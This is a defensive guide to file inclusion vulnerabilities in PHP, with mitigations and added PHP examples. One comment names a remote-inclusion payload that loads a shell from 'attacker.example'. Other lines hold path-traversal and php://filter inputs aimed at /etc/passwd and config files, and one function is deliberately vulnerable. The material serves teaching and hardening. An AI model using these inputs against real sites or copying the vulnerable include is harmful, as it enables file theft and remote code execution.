FILE INCLUSION
Last updated
File inclusion is a security flaw that occurs in web applications when an attacker can manipulate the way files are included or loaded within the application. This vulnerability arises when user input is used to determine the path or file that the application includes, without proper validation or sanitization. Depending on configuration, it can lead to local file inclusion (reading or executing files already on the server) or remote file inclusion (loading attacker-hosted code).
Sanitize User Input: Always sanitize and validate user input before using it in file inclusion operations.
Use Whitelists: Instead of allowing arbitrary file paths, use predefined whitelists of acceptable files or paths.
Disable allow_url_include: In PHP, ensure that allow_url_include is disabled in the php.ini configuration file. It defaults to Off and has been deprecated since PHP 7.4, but it should still be pinned explicitly, and the running SAPI (FPM, mod_php) should be checked rather than only the CLI, since each can read a different php.ini.
Use Absolute Paths: Avoid using relative paths based on user input, and instead rely on predefined, fixed paths.
Limit File Permissions: Restrict file access permissions to only necessary files and directories.
Utilize a Web Application Firewall (WAF), such as ModSecurity. ModSecurity minimizes false positives by offering a permissive, detection-only mode, which only reports requests it would have blocked. This lets defenders tune the rules to make sure no legitimate request is blocked. Even while the WAF is still in permissive mode, its alerts can be an early warning sign that an application is being attacked.
Avoid passing any user-controlled inputs into any file inclusion functions or APIs
Utilize a limited whitelist of allowed user inputs, and match each input to the file to be loaded, while having a default value for all other inputs
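The whitelist approach described above, as an added example rather than code from the original page: a vulnerable include beside a version that maps each accepted token to a fixed file and falls back to a default for everything else. The page names and the pages/ directory are assumptions.

```php
<?php
// Added example, not from the original page. Page names and paths are assumed.

// VULNERABLE: the request parameter is concatenated straight into include().
// ?page=../../../../etc/passwd (LFI) or, with allow_url_include=On,
// ?page=http://attacker.example/shell.txt (RFI) both reach include().
function render_vulnerable(array $get): void
{
    $page = $get['page'] ?? 'home';
    include 'pages/' . $page . '.php';
}

// HARDENED: map each accepted token to a fixed file. Anything not in the
// map resolves to a default, so user data never forms part of a path.
const PAGES = [
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

function resolve_page(?string $requested): string
{
    // Exact key match only: '../x', 'php://filter/...', '' and null all
    // miss the map and fall through to the default.
    if ($requested !== null && array_key_exists($requested, PAGES)) {
        return PAGES[$requested];
    }
    return PAGES['home'];
}

function render_hardened(array $get): void
{
    // ?page[]=x arrives as an array; treat anything that is not a string as absent.
    $raw  = $get['page'] ?? null;
    $file = resolve_page(is_string($raw) ? $raw : null);
    include __DIR__ . '/' . $file;   // absolute path built from a fixed prefix
}

// Show how the resolver treats constructed attacker inputs, without including anything.
foreach (['about', '../../etc/passwd', 'php://filter/convert.base64-encode/resource=index', ''] as $input) {
    printf("%-55s -> %s\n", var_export($input, true), resolve_page($input));
}
```

The mapping also removes the need to append an extension to user input, which is where null-byte and path-truncation tricks against older PHP versions used to apply.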
Globally disable the inclusion of remote files in web server configurations. In PHP this can be done by setting allow_url_fopen and allow_url_include to Off. Note that allow_url_fopen also governs legitimate uses such as file_get_contents() on a URL, so confirm the application does not depend on it before turning it off.
Lock web applications to their web root directory to prevent attackers from accessing non-web related files. In PHP that can be done by adding open_basedir = /var/www in the php.ini file. open_basedir restricts every filesystem function, not only include(), so any other directories the application genuinely needs (for example its session save path or a temp directory) must be listed as well, separated by colons. Treat it as defense in depth alongside input validation, not as a substitute for it.
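A runtime check for the allow_url_fopen, allow_url_include and open_basedir settings discussed above, as an added example that is not part of the original page. The document root /var/www/html and the /tmp entry are assumptions; adjust them to the application's real directories.

```php
<?php
// Added example, not from the original page. Audits the running PHP process
// for the include-related hardening settings. Expected hardened php.ini lines
// (paths are assumptions for this example):
//   allow_url_fopen   = Off
//   allow_url_include = Off
//   open_basedir      = /var/www/html:/tmp

function audit_include_settings(): array
{
    $findings = [];

    // ini_get() returns "" or "0" when a flag is Off, "1" when On, and
    // false when the directive is unknown to this PHP build.
    foreach (['allow_url_fopen', 'allow_url_include'] as $directive) {
        if (filter_var(ini_get($directive), FILTER_VALIDATE_BOOLEAN)) {
            $findings[] = $directive === 'allow_url_include'
                ? 'allow_url_include is On: include() of http:// and similar URLs is possible (RFI)'
                : 'allow_url_fopen is On: file functions accept URLs';
        }
    }

    $base = ini_get('open_basedir');
    if ($base === '' || $base === false) {
        $findings[] = 'open_basedir is unset: include() may read any file the PHP process user can';
    } else {
        // Each listed prefix should exist; a typo here silently widens nothing
        // but usually means the real directory is not the one being restricted.
        foreach (explode(PATH_SEPARATOR, $base) as $dir) {
            if (!is_dir($dir)) {
                $findings[] = "open_basedir entry '$dir' does not exist";
            }
        }
    }

    return $findings;
}

$findings = audit_include_settings();
if ($findings === []) {
    echo "OK: remote includes disabled and open_basedir set\n";
} else {
    foreach ($findings as $f) {
        echo "WARN: $f\n";
    }
}
```

Run this through the same SAPI the application uses (drop it in the web root temporarily, or run it under php-fpm), because `php -i | grep -E 'allow_url|open_basedir'` on the command line reports the CLI's php.ini, which may differ from the web server's. Remove the script afterwards.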
Also, ensure that certain potentially dangerous modules are disabled, like
Use a function that reads the path but returns only the filename portion, such as basename() in PHP. This drops directory components and stream-wrapper prefixes, but on its own still lets a user select any file in the target directory, so combine it with the whitelist approach above.
Sanitize user input by recursively removing any directory-traversal sequences: a single pass that strips "../" can be bypassed with "....//", which collapses back to "../" once the inner sequence is removed. Decode URL-encoded input before sanitizing, and remember that stripping traversal sequences does nothing against absolute paths or php:// wrappers.
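The two previous points side by side, as an added example that is not part of the original page: a single-pass strip, a recursive strip, and basename(), run over constructed attacker inputs so the single-pass bypass and the remaining gaps are visible.

```php
<?php
// Added example, not from the original page. Inputs are constructed for the demo.

// Naive: one pass of str_replace(). "....//" loses its inner "../" and
// what remains is "../" again, so the traversal survives.
function strip_traversal_once(string $path): string
{
    return str_replace(['../', '..\\'], '', $path);
}

// Recursive: keep stripping until the string stops changing.
function strip_traversal_recursive(string $path): string
{
    do {
        $before = $path;
        $path   = str_replace(['../', '..\\'], '', $path);
    } while ($path !== $before);
    return $path;
}

// Keep only the filename portion. Directory components and wrapper prefixes
// such as "php://filter/..." are discarded together with the path.
function filename_only(string $path): string
{
    return basename(str_replace('\\', '/', $path));
}

$samples = [
    '../../etc/passwd',                                   // plain traversal
    '....//....//etc/passwd',                             // single-pass bypass
    '..%2F..%2Fetc%2Fpasswd',                             // URL-encoded traversal
    '/etc/passwd',                                        // absolute path: no "../" to strip
    'php://filter/convert.base64-encode/resource=config', // stream wrapper: no "../" either
    'about',                                              // benign
];

foreach ($samples as $raw) {
    $decoded = urldecode($raw);   // decode first, then sanitize
    printf("%-52s once=%-18s recursive=%-52s basename=%s\n",
        $raw,
        strip_traversal_once($decoded),
        strip_traversal_recursive($decoded),
        filename_only($decoded));
}
```

For the "....//....//etc/passwd" sample the single pass yields "../../etc/passwd" while the recursive strip yields "etc/passwd"; the absolute path and the php://filter sample pass both strippers untouched, which is why the whitelist mapping, not sanitization, should be the primary control.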